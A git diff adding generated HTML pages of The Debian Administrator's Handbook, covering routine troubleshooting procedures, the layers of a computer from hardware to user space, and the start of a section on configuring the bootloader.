+              class="distribution distribution">Stretch</span>. It is a large software stack that is hard to maintain properly and benefits only few users who are usually expert enough to be able to backport the package from Debian <span
+              class="distribution distribution">Unstable</span>.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.development.html"><strong>Předcházející</strong>13.6. Development</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.office-suites.html"><strong>Další</strong>13.8. Office Suites</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.common-procedures.html b/tmp/cs-CZ/html/sect.common-procedures.html
new file mode 100644
index 000000000..8fd0e1aaa
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.common-procedures.html
@@ -0,0 +1,293 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">7.2. Common Procedures</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Documentation, Solving problems, Log files, README.Debian, Manual, info" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="solving-problems.html"
+        title="Kapitola 7. Solving Problems and Finding Relevant Information" /><link
+        rel="prev"
+        href="solving-problems.html"
+        title="Kapitola 7. Solving Problems and Finding Relevant Information" /><link
+        rel="next"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.common-procedures.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="solving-problems.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="basic-configuration.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.common-procedures"></a>7.2. Common Procedures</h2></div></div></div><a
+          id="id-1.10.5.2"
+          class="indexterm"></a><div
+          class="para">
+			The purpose of this section is to present some general tips on certain operations that an administrator will frequently have to perform. These procedures will of course not cover every possible case in an exhaustive way, but they may serve as starting points for the more difficult cases.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>DISCOVERY</em></span> Documentation in other languages</strong></p></div></div></div><div
+            class="para">
+			Often, documentation translated into a non-English language is available in a separate package with the name of the corresponding package, followed by <code
+              class="literal">-<em
+                class="replaceable">lang</em></code> (where <em
+              class="replaceable">lang</em> is the two-letter ISO code for the language).
+		</div><div
+            class="para">
+			For instance, the <span
+              class="emphasis"><em>apt-howto-fr</em></span> package contains the French translation of the howto for <span
+              class="emphasis"><em>APT</em></span>. Likewise, the <span
+              class="emphasis"><em>quick-reference-fr</em></span> and <span
+              class="emphasis"><em>debian-reference-fr</em></span> packages are the French versions of the reference guides for Debian (initially written in English by Osamu Aoki).
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.10.5.5"></a>7.2.1. Configuring a Program</h3></div></div></div><a
+            id="id-1.10.5.5.2"
+            class="indexterm"></a><a
+            id="id-1.10.5.5.3"
+            class="indexterm"></a><div
+            class="para">
+				When you want to configure an unknown package, you must proceed in stages. First, you should read what the package maintainer has documented. Reading <code
+              class="filename">/usr/share/doc/<em
+                class="replaceable">package</em>/README.Debian</code> will indeed allow you to learn of specific provisions made to simplify the use of the software. It is sometimes essential in order to understand the differences from the original behavior of the program, as described in the general documentation, such as howtos. Sometimes this file also details the most common errors in order for you to avoid wasting time on common problems.
+			</div><div
+            class="para">
+				Then, you should look at the software's official documentation — refer to <a
+              class="xref"
+              href="solving-problems.html#sect.documentation-sources">7.1 – „Documentation Sources“</a> to identify the various existing documentation sources. The <code
+              class="command">dpkg -L <em
+                class="replaceable">package</em></code> command gives a list of files included in the package; you can therefore quickly identify the available documentation (as well as the configuration files, located in <code
+              class="filename">/etc/</code>). <code
+              class="command">dpkg -s <em
+                class="replaceable">package</em></code> displays the package meta-data and shows any possible recommended or suggested packages; in there, you can find documentation or a utility that will ease the configuration of the software.
+			</div><div
+            class="para">
+				Finally, the configuration files are often self-documented by many explanatory comments detailing the various possible values for each configuration setting. So much so that it is sometimes enough to just choose a line to activate from among those available. In some cases, examples of configuration files are provided in the <code
+              class="filename">/usr/share/doc/<em
+                class="replaceable">package</em>/examples/</code> directory. They may serve as a basis for your own configuration file.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DEBIAN POLICY</em></span> Location of examples</strong></p></div></div></div><a
+              id="id-1.10.5.5.7.2"
+              class="indexterm"></a><div
+              class="para">
+				All examples must be installed in the <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/examples/</code> directory. This may be a configuration file, program source code (an example of the use of a library), or a data conversion script that the administrator can use in certain cases (such as to initialize a database). If the example is specific to a particular architecture, it should be installed in <code
+                class="filename">/usr/lib/<em
+                  class="replaceable">package</em>/examples/</code> and there should be a link pointing to that file in the <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/examples/</code> directory.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.10.5.6"></a>7.2.2. Monitoring What Daemons Are Doing</h3></div></div></div><div
+            class="para">
+				Understanding what a daemon does is somewhat more complicated, since it does not interact directly with the administrator. To check that a daemon is actually working, you need to test it. For example, to check the Apache (web server) daemon, test it with an HTTP request.
+			</div><div
+            class="para">
+				To allow such tests, each daemon generally records everything that it does, as well as any errors that it encounters, in what are called “log files” or “system logs”. Logs are stored in <code
+              class="filename">/var/log/</code> or one of its subdirectories. To know the precise name of a log file for each daemon, see its documentation. Note: a single test is not always sufficient if it does not cover all the possible usage cases; some problems only occur in particular circumstances.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> The <code
+                        class="command">rsyslogd</code> daemon</strong></p></div></div></div><a
+              id="id-1.10.5.6.4.2"
+              class="indexterm"></a><a
+              id="id-1.10.5.6.4.3"
+              class="indexterm"></a><a
+              id="id-1.10.5.6.4.4"
+              class="indexterm"></a><div
+              class="para">
+				<code
+                class="command">rsyslogd</code> is special: it collects logs (internal system messages) that are sent to it by other programs. Each log entry is associated with a subsystem (e-mail, kernel, authentication, etc.) and a priority; <code
+                class="command">rsyslogd</code> processes these two pieces of information to decide on what to do. The log message may be recorded in various log files, and/or sent to an administration console. The details are defined in the <code
+                class="filename">/etc/rsyslog.conf</code> configuration file (documented in the manual page of the same name).
+			</div><div
+              class="para">
+				Certain C functions, which are specialized in sending logs, simplify the use of the <code
+                class="command">rsyslogd</code> daemon. However some daemons manage their own log files (this is the case, for example, of <code
+                class="command">samba</code>, that implements Windows shares on Linux).
+			</div><div
+              class="para">
+				Note that when <code
+                class="command">systemd</code> is in use, the logs are actually collected by <code
+                class="command">systemd</code> before being forwarded to <code
+                class="command">rsyslogd</code>. They are thus also available via <code
+                class="command">systemd</code>'s journal and can be consulted with <code
+                class="command">journalctl</code> (see <a
+                class="xref"
+                href="unix-services.html#sect.systemd">9.1.1 – „The systemd init system“</a> for details).
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Daemon</strong></p></div></div></div><a
+              id="id-1.10.5.6.5.2"
+              class="indexterm"></a><div
+              class="para">
+				A daemon is a program that is not explicitly invoked by the user and that stays in the background, waiting for a certain condition to be met before performing a task. Many server programs are daemons, a term that explains that the letter “d” is frequently present at the end of their name (<code
+                class="command">sshd</code>, <code
+                class="command">smtpd</code>, <code
+                class="command">httpd</code>, etc.).
+			</div></div><div
+            class="para">
+				As a preventive operation, the administrator should regularly read the most relevant server logs. They can thus diagnose problems before they are even reported by disgruntled users. Indeed users may sometimes wait for a problem to occur repeatedly over several days before reporting it. In many cases, there are specific tools to analyze the contents of the larger log files. In particular, such utilities exist for web servers (such as <code
+              class="command">analog</code>, <code
+              class="command">awstats</code>, <code
+              class="command">webalizer</code> for Apache), for FTP servers, for proxy/cache servers, for firewalls, for e-mail servers, for DNS servers, and even for print servers. Other tools, such as <code
+              class="command">logcheck</code> (a software discussed in <a
+              class="xref"
+              href="security.html">14 – „<em>Security</em>“</a>), scan these files in search of alerts to be dealt with.
+			</div><a
+            id="id-1.10.5.6.7"
+            class="indexterm"></a><a
+            id="id-1.10.5.6.8"
+            class="indexterm"></a><a
+            id="id-1.10.5.6.9"
+            class="indexterm"></a><a
+            id="id-1.10.5.6.10"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.10.5.7"></a>7.2.3. Asking for Help on a Mailing List</h3></div></div></div><div
+            class="para">
+				If your various searches haven't helped you to get to the root of a problem, it is possible to get help from other, perhaps more experienced people. This is exactly the purpose of the <code
+              class="email"><a
+                class="email"
+                href="mailto:debian-user@lists.debian.org">debian-user@lists.debian.org</a></code> mailing list. As with any community, it has rules that need to be followed. Before asking any question, you should check that your problem isn't already covered by recent discussions on the list or by any official documentation. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/DebianMailingLists">https://wiki.debian.org/DebianMailingLists</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://lists.debian.org/debian-user/">https://lists.debian.org/debian-user/</a></div>
+			</div><a
+            id="id-1.10.5.7.3"
+            class="indexterm"></a><a
+            id="id-1.10.5.7.4"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Netiquette applies</strong></p></div></div></div><div
+              class="para">
+				In general, for all correspondence on e-mail lists, the rules of Netiquette should be followed. This term refers to a set of common sense rules, from common courtesy to mistakes that should be avoided. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://tools.ietf.org/html/rfc1855">http://tools.ietf.org/html/rfc1855</a></div> <a
+                id="id-1.10.5.7.5.2.2"
+                class="indexterm"></a>
+			</div><div
+              class="para">
+				Furthermore, for any communication channel managed by the Debian project, you are bound by the Debian Code of Conduct: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/code_of_conduct">https://www.debian.org/code_of_conduct</a></div>
+			</div></div><div
+            class="para">
+				Once those two conditions are met, you can think of describing your problem to the mailing list. Include as much relevant information as possible: various tests conducted, documentation consulted, how you attempted to diagnose the problem, the packages concerned or those that may be involved, etc. Check the Debian Bug Tracking System (BTS, described in sidebar <a
+              class="xref"
+              href="sect.debian-internals.html#sidebar.bts"><span
+                class="emphasis"><em>NÁSTROJ</em></span> Systém na sledování chyb</a>) for similar problems, and mention the results of that search, providing links to bugs found. BTS starts on: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.debian.org/Bugs/index.html">http://www.debian.org/Bugs/index.html</a></div>
+			</div><div
+            class="para">
+				The more courteous and precise you have been, the greater your chances are of getting an answer, or, at least, some elements of response. If you receive relevant information by private e-mail, think of summarizing this information publicly so that others can benefit. This also allows the list's archives, searched through various search engines, to show the resolution for others who may have the same question.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.10.5.8"></a>7.2.4. Reporting a Bug When a Problem Is Too Difficult</h3></div></div></div><a
+            id="id-1.10.5.8.2"
+            class="indexterm"></a><a
+            id="id-1.10.5.8.3"
+            class="indexterm"></a><div
+            class="para">
+				If all of your efforts to resolve a problem fail, it is possible that a resolution is not your responsibility, and that the problem is due to a bug in the program. In this case, the proper procedure is to report the bug to Debian or directly to the upstream developers. To do this, isolate the problem as much as possible and create a minimal test situation in which it can be reproduced. If you know which program is the apparent cause of the problem, you can find its corresponding package using the command, <code
+              class="command">dpkg -S <em
+                class="replaceable">file_in_question</em></code>. Check the Bug Tracking System (<code
+              class="literal">https://bugs.debian.org/<em
+                class="replaceable">package</em></code>) to ensure that the bug has not already been reported. You can then send your own bug report, using the <code
+              class="command">reportbug</code> command, including as much information as possible, especially a complete description of those minimal test cases that will allow anyone to recreate the bug.
+			</div><div
+            class="para">
+				The elements of this chapter are a means of effectively resolving issues that the following chapters may bring about. Use them as often as necessary!
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="solving-problems.html"><strong>Předcházející</strong>Kapitola 7. Solving Problems and Finding Relevant...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="basic-configuration.html"><strong>Další</strong>Kapitola 8. Basic Configuration: Network, Account...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.computer-layers.html b/tmp/cs-CZ/html/sect.computer-layers.html
new file mode 100644
index 000000000..486d61d2a
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.computer-layers.html
@@ -0,0 +1,196 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">B.3. Inner Workings of a Computer: the Different Layers Involved</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="prev"
+        href="sect.filesystem-hierarchy.html"
+        title="B.2. Organization of the Filesystem Hierarchy" /><link
+        rel="next"
+        href="sect.kernel-role-and-tasks.html"
+        title="B.4. Some Tasks Handled by the Kernel" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.computer-layers.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.filesystem-hierarchy.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-role-and-tasks.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.computer-layers"></a>B.3. Inner Workings of a Computer: the Different Layers Involved</h2></div></div></div><div
+          class="para">
+			A computer is often considered as something rather abstract, and the externally visible interface is much simpler than its internal complexity. Such complexity comes in part from the number of pieces involved. However, these pieces can be viewed in layers, where a layer only interacts with those immediately above or below.
+		</div><div
+          class="para">
+			An end-user can get by without knowing these details… as long as everything works. When confronting a problem such as, “The internet doesn't work!”, the first thing to do is to identify in which layer the problem originates. Is the network card (hardware) working? Is it recognized by the computer? Does the Linux kernel see it? Are the network parameters properly configured? All these questions isolate an appropriate layer and focus on a potential source of the problem.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.hardware"></a>B.3.1. The Deepest Layer: the Hardware</h3></div></div></div><a
+            id="id-1.21.6.4.2"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.3"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.4"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.5"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.6"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.7"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.8"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.9"
+            class="indexterm"></a><div
+            class="para">
+				Let us start with a basic reminder that a computer is, first and foremost, a set of hardware elements. There is generally a main board (known as the <span
+              class="emphasis"><em>motherboard</em></span>), with one (or more) processor(s), some RAM, device controllers, and extension slots for option boards (for other device controllers). Most noteworthy among these controllers are IDE (Parallel ATA), SCSI and Serial ATA, for connecting to storage devices such as hard disks. Other controllers include USB, which is able to host a great variety of devices (ranging from webcams to thermometers, from keyboards to home automation systems) and IEEE 1394 (Firewire). These controllers often allow connecting several devices so the complete subsystem handled by a controller is therefore usually known as a “bus”. Option boards include graphics cards (into which monitor screens will be plugged), sound cards, network interface cards, and so on. Some main boards are pre-built with these features, and don't need option boards.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Checking that the hardware works</strong></p></div></div></div><div
+              class="para">
+				Checking that a piece of hardware works can be tricky. On the other hand, proving that it doesn't work is sometimes quite simple.
+			</div><div
+              class="para">
+				A hard disk drive is made of spinning platters and moving magnetic heads. When a hard disk is powered up, the platter motor makes a characteristic whir. It also dissipates energy as heat. Consequently, a hard disk drive that stays cold and silent when powered up is broken.
+			</div><div
+              class="para">
+				Network cards often include LEDs displaying the state of the link. If a cable is plugged in and leads to a working network hub or switch, at least one LED will be on. If no LED lights up, either the card itself, the network device, or the cable between them, is faulty. The next step is therefore testing each component individually.
+			</div><div
+              class="para">
+				Some option boards — especially 3D video cards — include cooling devices, such as heat sinks and/or fans. If the fan does not spin even though the card is powered up, a plausible explanation is the card overheated. This also applies to the main processor(s) located on the main board.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.bios"></a>B.3.2. The Starter: the BIOS or UEFI</h3></div></div></div><a
+            id="id-1.21.6.5.2"
+            class="indexterm"></a><a
+            id="id-1.21.6.5.3"
+            class="indexterm"></a><a
+            id="id-1.21.6.5.4"
+            class="indexterm"></a><div
+            class="para">
+				Hardware, on its own, is unable to perform useful tasks without a corresponding piece of software driving it. Controlling and interacting with the hardware is the purpose of the operating system and applications. These, in turn, require functional hardware to run.
+			</div><div
+            class="para">
+				This symbiosis between hardware and software does not happen on its own. When the computer is first powered up, some initial setup is required. This role is assumed by the BIOS or UEFI, a piece of software embedded into the main board that runs automatically upon power-up. Its primary task is searching for software it can hand over control to. Usually, in the BIOS case, this involves looking for the first hard disk with a boot sector (also known as the <span
+              class="emphasis"><em>master boot record</em></span> or <acronym
+              class="acronym">MBR</acronym>), loading that boot sector, and running it. From then on, the BIOS is usually not involved (until the next boot). In the case of UEFI, the process involves scanning disks to find a dedicated EFI partition containing further EFI applications to execute.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Setup, the BIOS/UEFI configuration tool</strong></p></div></div></div><a
+              id="id-1.21.6.5.7.2"
+              class="indexterm"></a><div
+              class="para">
+				The BIOS/UEFI also contains a piece of software called Setup, designed to allow configuring aspects of the computer. In particular, it allows choosing which boot device is preferred (for instance, the floppy disk or CD-ROM drive), setting the system clock, and so on. Starting Setup usually involves pressing a key very soon after the computer is powered on. This key is often <span
+                class="keycap"><strong>Del</strong></span> or <span
+                class="keycap"><strong>Esc</strong></span>, sometimes <span
+                class="keycap"><strong>F2</strong></span> or <span
+                class="keycap"><strong>F10</strong></span>. Most of the time, the choice is flashed on screen while booting.
+			</div></div><div
+            class="para">
+				The boot sector (or the EFI partition), in turn, contains another piece of software, called the bootloader, whose purpose is to find and run an operating system. Since this bootloader is not embedded in the main board but loaded from disk, it can be smarter than the BIOS, which explains why the BIOS does not load the operating system by itself. For instance, the bootloader (often GRUB on Linux systems) can list the available operating systems and ask the user to choose one. Usually, a time-out and default choice is provided. Sometimes the user can also choose to add parameters to pass to the kernel, and so on. Eventually, a kernel is found, loaded into memory, and executed.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> UEFI, a modern replacement to the BIOS</strong></p></div></div></div><a
+              id="id-1.21.6.5.9.2"
+              class="indexterm"></a><a
+              id="id-1.21.6.5.9.3"
+              class="indexterm"></a><div
+              class="para">
+				UEFI is a relatively recent development. Most new computers will support UEFI booting, but usually they also support BIOS booting alongside for backwards compatibility with operating systems that are not ready to exploit UEFI.
+			</div><div
+              class="para">
+				This new system gets rid of some of the limitations of BIOS booting: with the usage of a dedicated partition, the bootloaders no longer need special tricks to fit in a tiny <span
+                class="emphasis"><em>master boot record</em></span> and then discover the kernel to boot. Even better, with a suitably built Linux kernel, UEFI can directly boot the kernel without any intermediary bootloader. UEFI is also the basic foundation used to deliver <span
+                class="emphasis"><em>Secure Boot</em></span>, a technology ensuring that you run only software validated by your operating system vendor.
+			</div></div><div
+            class="para">
+				The BIOS/UEFI is also in charge of detecting and initializing a number of devices. Obviously, this includes the IDE/SATA devices (usually hard disk(s) and CD/DVD-ROM drives), but also PCI devices. Detected devices are often listed on screen during the boot process. If this list goes by too fast, use the <span
+              class="keycap"><strong>Pause</strong></span> key to freeze it for long enough to read. Installed PCI devices that don't appear are a bad omen. At worst, the device is faulty. At best, it is merely incompatible with the current version of the BIOS or main board. PCI specifications evolve, and old main boards are not guaranteed to handle newer PCI devices.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel"></a>B.3.3. The Kernel</h3></div></div></div><div
+            class="para">
+				Both the BIOS/UEFI and the bootloader only run for a few seconds each; now we are getting to the first piece of software that runs for a longer time, the operating system kernel. This kernel assumes the role of a conductor in an orchestra, and ensures coordination between hardware and software. This role involves several tasks including: driving hardware, managing processes, users and permissions, the filesystem, and so on. The kernel provides a common base to all other programs on the system.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.userspace-presentation"></a>B.3.4. The User Space</h3></div></div></div><div
+            class="para">
+				Although everything that happens outside of the kernel can be lumped together under “user space”, we can still separate it into software layers. However, their interactions are more complex than before, and the classifications may not be as simple. An application commonly uses libraries, which in turn involve the kernel, but the communications can also involve other programs, or even many libraries calling each other.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.filesystem-hierarchy.html"><strong>Předcházející</strong>B.2. Organization of the Filesystem Hierarchy</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-role-and-tasks.html"><strong>Další</strong>B.4. Some Tasks Handled by the Kernel</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.config-bootloader.html b/tmp/cs-CZ/html/sect.config-bootloader.html
new file mode 100644
index 000000000..36d452634
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.config-bootloader.html
@@ -0,0 +1,374 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.8. Configuring the Bootloader</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.config-printing.html"
+        title="8.7. Printer Configuration" /><link
+        rel="next"
+        href="sect.config-misc.html"
+        title="8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.config-bootloader.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-printing.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-misc.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.config-bootloader"></a>8.8. Configuring the Bootloader</h2></div></div></div><a
+          id="id-1.11.12.2"
+          class="indexterm"></a><a
+          id="id-1.11.12.3"
+          class="indexterm"></a><div
+          class="para">
+			It is probably already functional, but it is always good to know how to configure and install the bootloader in case it disappears from the Master Boot Record. This can occur after installation of another operating system, such as Windows. The following information can also help you to modify the bootloader configuration if needed.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Master boot record</strong></p></div></div></div><a
+            id="id-1.11.12.5.2"
+            class="indexterm"></a><a
+            id="id-1.11.12.5.3"
+            class="indexterm"></a><div
+            class="para">
+			The Master Boot Record (MBR) occupies the first 512 bytes of the first hard disk, and is the first thing loaded by the BIOS to hand over control to a program capable of booting the desired operating system. In general, a bootloader gets installed in the MBR, removing its previous content.
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.identify-disks"></a>8.8.1. Identifying the Disks</h3></div></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> <span
+                        class="emphasis"><em>udev</em></span> and <code
+                        class="filename">/dev/</code></strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="filename">/dev/</code> directory traditionally houses so-called “special” files, intended to represent system peripherals (see sidebar <a
+                class="xref"
+                href="sect.creating-accounts.html#sidebar.special-files"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> Device access permissions</a>). Once upon a time, it used to contain all special files that could potentially be used. This approach had a number of drawbacks among which the fact that it restricted the number of devices that one could use (due to the hardcoded list of names), and that it was impossible to know which special files were actually useful.
+			</div><div
+              class="para">
+				Nowadays, the management of special files is entirely dynamic and matches better the nature of hot-swappable computer devices. The kernel cooperates with <span
